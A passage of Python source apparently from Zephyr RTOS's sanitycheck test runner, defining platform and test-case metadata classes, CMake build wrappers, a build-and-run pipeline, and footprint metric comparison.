for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcse
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
self.suite.build_filtered_tests += 1
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Wa,--fatal-warnings"
else:
ldflags = cflags = aflags = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS="{cflags}"',
f'-DEXTRA_AFLAGS="{aflags}',
f'-DEXTRA_LDFLAGS="{ldflags}"',
f'-G{self.generator}'
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.pid_fn = os.path.join(instance.build_dir, "mdb.pid")
instance.handler.call_west_flash = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
self.suite.build_filtered_tests += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.status}")
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self):
total_tests_width = len(str(self.suite.total_to_do))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout"]:
if instance.status == "error":
self.suite.total_errors += 1
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if self.suite.total_to_do > 0:
completed_perc = int((float(self.suite.total_done) / self.suite.total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if self.suite.build_filtered_tests > 0 else Fore.RESET,
self.suite.build_filtered_tests,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan or self.ubsan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_skipped_cases = 0 # number of skipped test cases
self.total_to_do = 0 # number of test instances to be run
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.build_filtered_tests = 0
self.total_passed = 0
self.total_errors = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
# run integration tests only
self.integration = False
self.version = "NA"
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self):
self.total_tests = len(self.instances)
self.total_cases = 0
self.total_skipped = 0
self.total_skipped_cases = 0
self.total_passed = 0
for instance in self.instances.values():
self.total_cases += len(instance.testcase.cases)
if instance.status == 'skipped':
self.total_skipped += 1
self.total_skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
self.total_passed += 1
for res in instance.results.values():
if res == 'SKIP':
self.total_skipped_cases += 1
self.total_to_do = self.total_tests - self.total_skipped
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
